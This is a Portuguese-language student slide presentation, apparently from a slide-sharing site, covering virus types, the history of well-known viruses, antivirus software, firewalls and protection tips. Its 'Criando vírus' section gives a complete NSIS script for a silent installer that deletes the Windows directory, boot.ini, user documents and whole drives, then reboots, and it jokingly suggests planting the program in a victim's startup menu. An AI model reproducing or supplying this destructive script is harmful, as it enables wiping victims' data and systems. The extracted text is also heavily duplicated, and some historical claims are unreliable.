Upload
eduardo-bregaida
View
1.991
Download
6
Embed Size (px)
DESCRIPTION
Trabalho apresentado na aula de Arquitetura de Hardware para o professor Claudio Cura. Integrantes: Eduardo Bregaida Roberta Davi Vinicius
Citation preview
Vírus
Texto Educativo Não nos responsabilizamos pelo mau uso… Não façam besteiras ;p
Quem Somos?
São softwares que foram São softwares que foram desenvolvidos por desenvolvidos por programadores, onde burlam programadores, onde burlam sistemas alheios; sistemas alheios;
Atuam da mesma forma que Atuam da mesma forma que um vírus real;um vírus real;
Primeiro vírus surgiu em Primeiro vírus surgiu em 1983,por Lean Eidelmen;1983,por Lean Eidelmen;
Alguns tipos Alguns tipos
de de vírusvírus
Virus de Boot- Infecta a partição deinicialização do Sistema Operacional.
Time Bomb - Ativados em Datas e horários especificos.
Worm - Vírus que tenta se multiplicar em outras máquinas.
Trojan Hourse - Assim como na história, este vírus se introduz na máquina da vítima, permitindo que o atacante tenha controle sobre a máquina.Hijackers - Scripts que normalmente atacam os Browsers modificando suas páginas iniciais e abrindo urls não conhecidas pelo usuário..
Keylogger - Vírus que obtem tudo que o usuário digita e envia a pessoa que o enviou.
Computador Zumbi ou Estado Zumbi - Vírus que permite ao atacante instalar Keyloggers e outros, também pode aplicar ataques a sites, sem que o usuário deste computador saiba.
Stealth - Vírus polimórfico, que se multiplica e se torna indetectável, exemplos: Natas e Brain.
Macro - Vírus que infecta o pacote Office, causando inconveniências para a pessoa que tem seu computador infectado.
Dados estatísticos
Dados estatísticosDados estatísticos
•Até Até 1995 1995 - 5.000 vírus conhecidos;- 5.000 vírus conhecidos;•Até Até 1999 1999 - 20.500 vírus conhecidos;- 20.500 vírus conhecidos;•Até Até 2000 2000 - 49.000 vírus conhecidos;- 49.000 vírus conhecidos;•Até Até 2001 2001 - 58.000 vírus conhecidos;- 58.000 vírus conhecidos;•Até Até 20052005 - Aproximadamente 75.000 vírus - Aproximadamente 75.000 vírus conhecidos;conhecidos;•Até Até 20072007 - Aproximadamente 200.000 vírus - Aproximadamente 200.000 vírus conhecidos;conhecidos;•Até Até novembronovembro de de 20082008 - Mais de 530.000 - Mais de 530.000 vírus conhecidos.vírus conhecidos.•Até Até marçomarço de de 20092009 - Mais 630.000 vírus - Mais 630.000 vírus conhecidos.conhecidos.
Crackers e hackers
Hackers são os que quebram senhas, códigos e sistemas de segurança por puro prazer em achar tais falhas. Preocupam-se em conhecer o funcionamento mais íntimo
de um sistema computacional ou seja uma sem intenções de prejudicar outras ou invadir sistemas.
Crackers é o criminoso virtual, que extorque pessoas usando seus conhecimentos, usando as mais variadas estratégias. Aficcionados em informática, conhecem muitas linguagens
de programação e quase sempre jovens, que criavam seus vírus, para muitas vezes, saber o quanto eles poderiam se propagar.
Vírus mais comuns
Elk Cloner
•O primeiro vírus ampla distribuição criado por um garoto de 15 anos em 1982.•Atacava computadores Apple 2 com DOS;•Não atacava arquivos apenas exibia uma mensagem:•Elk Cloner: The program with a personality It will get on all your disks It will infiltrate your chips Yes it's Cloner! It will stick to you like glue It will modify RAM too Send in the Cloner!
Brain Janeiro de 1986; Considerado um dos primeiros vírus conhecido; Afetava o MS-DOS; Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd.
BRAIN COMPUTER SERVICES 730 NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE: 430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination…
Motivo: foi criado para monitorar cópias piratas de um software médico de monitoramento cardíaco que haviam desenvolvido para a Apple;
O código foi portado para DOS; A companhia foi alvo de ações judiciais e foi fechada.
Ping Pong
•Ano 1988;•Um dos primeiros vírus conhecidos no Brasil;•Afetava o MS-DOS e PC-DOS;•Se instalava na Interrupção 8 da BIOS;•Dependendo do Tic-Tac do relógio a bolinha pulava de um lado a outro da tela;•Uma vez o computador infectado, multiplicava-se nos disquetes.
Sasser
Um dos primeiros que explora a invasão do PC; Não precisa abrir o email ou executar o arquivo; A infecção da-se por um processo de Exploit; Este Vírus explorava a rede e permitia controle
do computador infectado; Utilizava a porta RPC do Windows para invadir.
Jerusálem Residente em memória; Infecta arquivos com extensão .COM, .EXE, .BIN, .PIF e .OVL; Não infecta o arquivo COMMAND.COM; Pode ter sido baseado no vírus Suriv 3.00 (isolado após o Jerusalém); Vários outros vírus se baseiam em seu código e método de infecção e
ataque; Interrompe o computador das 08h e 21h; Após 30 minutos aumentam demais os arquivos infectados, deixando os
computadores lentos; Ataca às sextas-feiras cujo número seja 13, por isso muitos os chamam de
Sexta-Feira 13; Nesse momento o vírus apaga qualquer arquivo que o usuário tenta
executar.
Zotob
Vírus do tipo Worm que ataca o Windows 2000; A gravidade classificada pela Microsoft como
moderada; A Microsoft possui uma atualização de segurança
contra este vírus e suas variantes; Variantes conhecidas:
Zotob A, B, C, D e E.
Winman32 Um vírus informativo; Modo de infecção: sites de relacionamento; Não causa danos ao SO, porém dispara mensagens nos sistemas de
relacionamento que a vitima acessa; Mensagens conhecidas:
"Olha esse video q encontrei sobre o acidente da gol.. (link com vírus omitido)"
"Veja as fotos da nossa festa, ficaram ótimas!! (link com vírus omitido)"
"Assista ao vídeo da Daniela Cicarrelli fazendo sexo com o namorado na praia, últimos dias no ar!!! (link com vírus omitido)"
"Um casal de adolescentes caiu na besteira de tirar fotos e filmar suas transas, a porra toda caiu na net, coitados... veja você mesmo (link com vírus omitido)"
Sircam
Se propaga por e-mail;Ataca usuários de Windows;Texto enviado no e-mail uma
mensagem com o vírus em anexo: "Eu te enviei esse arquivo, me
responda se gostou".
Natas ou Satan
Desenvolvido por James Gentile em 94; Ataca o SO DOS; Seu nome é o nome Satanás em inglês Satan; Adota Técnicas Stelth, quando está na RAM,
impede que o código que ele aloja no final de todos os programas infectados seja detectado;
Pode sobreescrever trechos do HD ou setor de Boot.
Leandro & Kelly Criado em 1995; Distribuído em SW piratas; Atacava o SO MS-DOS; Se multiplica em discos inseridos no PC infectado; Infecta o Boot; Teve uma grande repercursão, pois é uma
variante do vírus Michelangelo; Foi um vírus brasileiro de grande impacto.
MichelangeloVariante do Stoned;Entra em atividade no dia do
nascimento de Michelangelo, dia 6 de março;
Sobreescreve a maior parte do HD.
Stoned Feito para ser inofensivo, porém devido um erro de
código, porém escreve na trilha zero do disco; Ah diversas variantes deste vírus, alguns com
mensagens plíticas, outras explodem a tela em cores de chamas quando passa um mês depois de instalados;
Mensagens mais comuns: “Your computer is now stoned." "Bloody! Jun. 4, 1989". "The Swedish Disaster".
Pro Rat É um backdoor da classe Rat (Remote Administrator Tool), possui muitas funções de espião; Permite que pessoas executem muitas ações maliciosas; Algumas funcões:
Keystrokes (Keylogger) Roubar senhas Controle total sobre arquivos Formatação de drives Controle de impressora Abrir/fechar drive de CD Esconder a barra de tarefas, área de trabalho e botão iniciar Tirar screenshots Visualizar informações do sistema Visualizar webcam Escutar microfone Fazer downloads e rodar arquivos Travar a tela, mouse, teclado, dentre outros Visualizar a area de trabalho da vitima Chegando até a formatar a máquina da vítima.
NetBus
Outro backdoor;Uma vez instalado permite que o
atacante tenha total controle sobre a máquina da vítima;
Muito usado para roubar informações.
Chernobyl
Win32/CIH ou Chernobyl
Criado em 98 por Chen Ing-Hau; Um dos mais temidos vírus e o ÚNICO efetivo no ataque ao
Hardware; Apagava a BIOS e o Disco de Boot no dia 26 de abril (algumas
variantes atacavam em outros meses também); Curiosidade: em 26 de Abril aconteceu o desastre Nuclear de
Chernobyl, daí o nome; É um vírus residente em memória, infecta qualquer disco
externo; É da categoria stealth; Ataca a Flash Bios; Por motivos de compatibilidade não ataca as versões Windows
NT, 2000, XP, 2003, Vista e 7;
Win32/CIH ou Chernobyl
Primeiro Passo Download da BIOS e uma placa mãe compatível.
Segundo passo, reprogramação da BIOS: No DOS, remova o chip do BIOS bom e substitua pelo chip do BIOS.
Passo três: Rode o programa de gravação do BIOS e reprograme o BIOS apagado.
Passo quatro: Desligue o micro, remova o BIOS que você acabou de reprogramar e
instale de volta o BIOS original. Passo quatro:
Instale o BIOS reprogramado na placa-mãe "morta" e ligue-a. Passo cinco:
Rode o anti-vírus e o programa de recuperação de dados no HD do micro atacado, caso o mesmo tenha sido infectado.
Informações: http://www.clubedohardware.com.br/artigos/654/1
Vírus em celularVírus em celular
"Cabir.A", "Cabir.A", Junho de 2004;Junho de 2004;
Não infectou muitos aparelhos;Não infectou muitos aparelhos;
Transmitido via BlueTooh;Transmitido via BlueTooh;
Variantes em 2005;Variantes em 2005;
Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A; Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A;
São apenas vírus que disparam mensagens e afins;
Não tem propagação rápida;
Não são destrutivos.
Criando Criando vírusvírus
Com o Bloco de notas digite :Com o Bloco de notas digite :
!define PRODUCT_NAME "APAGADOR_XXX"!define PRODUCT_NAME "APAGADOR_XXX"!define PRODUCT_VERSION "1.0"!define PRODUCT_VERSION "1.0"!define PRODUCT_PUBLISHER "HACKER_XXX"!define PRODUCT_PUBLISHER "HACKER_XXX"
SetCompressor lzmaSetCompressor lzma Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"OutFile "MeuVirus.exe"InstallDir "$TEMP"InstallDir "$TEMP"Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"install.ico"SilentInstall silentSilentInstall silent
Section "Sec001" SEC01Section "Sec001" SEC01Delete /REBOOTOK "$WINDIR\*.*"Delete /REBOOTOK "$WINDIR\*.*"SectionEndSectionEnd
Section -PostSection -PostRebootRebootSectionEndSectionEnd
Próximo passo:Próximo passo:
Salvar ComoSalvar Como
qualquerNomequalquerNome.nsi.nsi
Experimente jogá-lo no menu iniciar da vítima ;)Experimente jogá-lo no menu iniciar da vítima ;)
Mais? =)
Tudo o que você deletar coloque essas Tudo o que você deletar coloque essas linhas:linhas:
Delete /REBOOTOK "C:\boot.ini"Delete /REBOOTOK "C:\boot.ini"Delete /REBOOTOK "C:\Meus documentos\*.*"Delete /REBOOTOK "C:\Meus documentos\*.*"Delete /REBOOTOK "C:\*.*"Delete /REBOOTOK "C:\*.*"Delete /REBOOTOK "D:\*.*"Delete /REBOOTOK "D:\*.*"Delete /REBOOTOK "E:\*.*"Delete /REBOOTOK "E:\*.*"Delete /REBOOTOK "F:\*.*"Delete /REBOOTOK "F:\*.*"Delete /REBOOTOK "G:\*.*"Delete /REBOOTOK "G:\*.*"Delete /REBOOTOK "C:\Arquivos de Delete /REBOOTOK "C:\Arquivos de programas\*.*"programas\*.*"
Adicione o que quiser, arquivos Adicione o que quiser, arquivos específicos, etc.específicos, etc.
Usuário de Windows
Uma Esperança
Antivírussão softwares projetados para são softwares projetados para detectar e eliminar vírus de detectar e eliminar vírus de computador, monitorando computador, monitorando automaticamente todos os automaticamente todos os arquivos que são abertos no PCarquivos que são abertos no PC
Por vezes quando executamos um qualquer script no Windows seja ele VBscript ou JSscript recebemos uma mensagem do antivírus a avisar da exploração de alguma falha do sistema
Peter Norton, empresário de TI, apagou acidentalmente um arquivo, com isso desenvolveu o Norton Utilities para restaurá-los. Ele criou a Symantec, em 1982, dando início a criação e comercialização de softwares de seguranças no mercado, e livros sobre o assunto. Ele foi um dos primeiros desenvolvedores de sistemas de segurança
Apresentação do Microsoft PowerPoint
FirewallFirewallOutra grande Outra grande ferramenta de ferramenta de proteção contra os proteção contra os VírusVírus
São programas que monitoram todos os dados que entram e saem do micro
funcionam como complemento do antivírus, pois ajudam a evitar que os vírus tentem se multiplicar via rede e dificulta a ação de hackers (invasores de computadores)
Seu objetivo é permitir somente a transmissão e a recepção de dados autorizados
Filtragem de pacotes•firewall que trabalha na filtragem de pacotes é muito utilizado em redes pequenas ou de porte médio. •Alguns sistemas ou serviços podem ser liberados completamente (por exemplo, o serviço de e-mail da rede); •Enquanto outros são bloqueados por padrão, por terem riscos elevados (como softwares de mensagens instantâneas, tal como o ICQ). •O grande problema desse tipo de firewall, é que as regras aplicadas podem ser muito complexas e causar perda de desempenho da rede ou não serem eficazes o suficiente
O firewall de aplicação permite um acompanhamento mais preciso do tráfego entre a rede e a Internet (ou entre a rede e outra rede). É possível, inclusive, contar com recursos de log e ferramentas de auditoria. Tais características deixam claro que este tipo de firewall é voltado a redes de porte médio ou grande e que sua configuração exige certa experiência no assunto
Razões para utilizar um Razões para utilizar um firewallfirewall
11 - O firewall pode ser usado para ajudar a impedir que - O firewall pode ser usado para ajudar a impedir que sua rede ou seu computador seja acessado sem sua rede ou seu computador seja acessado sem autorização. Assim, é possível evitar que informações autorização. Assim, é possível evitar que informações sejam capturadas ou que sistemas tenham seu sejam capturadas ou que sistemas tenham seu funcionamento prejudicado pela ação de hackersfuncionamento prejudicado pela ação de hackers
22 - O firewall é um grande aliado no combate a vírus e - O firewall é um grande aliado no combate a vírus e cavalos –de -tróia, uma vez que é capaz de bloquear cavalos –de -tróia, uma vez que é capaz de bloquear portas que eventualmente sejam usadas pelas "pragas portas que eventualmente sejam usadas pelas "pragas digitais" ou então bloquear acesso a programas não digitais" ou então bloquear acesso a programas não autorizadosautorizados
33 - Em redes corporativas, é possível evitar que os - Em redes corporativas, é possível evitar que os usuários acessem serviços ou sistemas indevidos, além usuários acessem serviços ou sistemas indevidos, além de ter o controle sobre as ações realizadas na rede, de ter o controle sobre as ações realizadas na rede, sendo possível até mesmo descobrir quais usuários as sendo possível até mesmo descobrir quais usuários as efetuaramefetuaram
As 3 principais razões para se usar um firewall são:
Dicas de como se proteger
Desconfie dos e-mails que recebe...
Não clique em qualquer link ou anexo...
Simples não?
Não abra qualquer site;
Não baixe qualquer arquivo sem saber a fonte;
NÃO EXISTE JOGOS DE 300Kb para PlayStation e afins...
Nunca forneça suas senhas...
Sempre atualize seus sistemas de proteção:
Firewall;Anti-Vírus;Anti-Spyware;Bla bla bla ;)
Não deixar pastas compartilhadas no HD desnecessariamente
Certificar que a conexão estabelecida entre o computador e os servidores é segura, conforme explicado no tópico segurança no Internet Banking
Te pego na Encruza
Maldita inclusão digital e PC do milhão…
http://www.youtube.com/watch?v=8zFYt1_0FUE
O Windows não tem falhas…
Não quer vírus?
FIM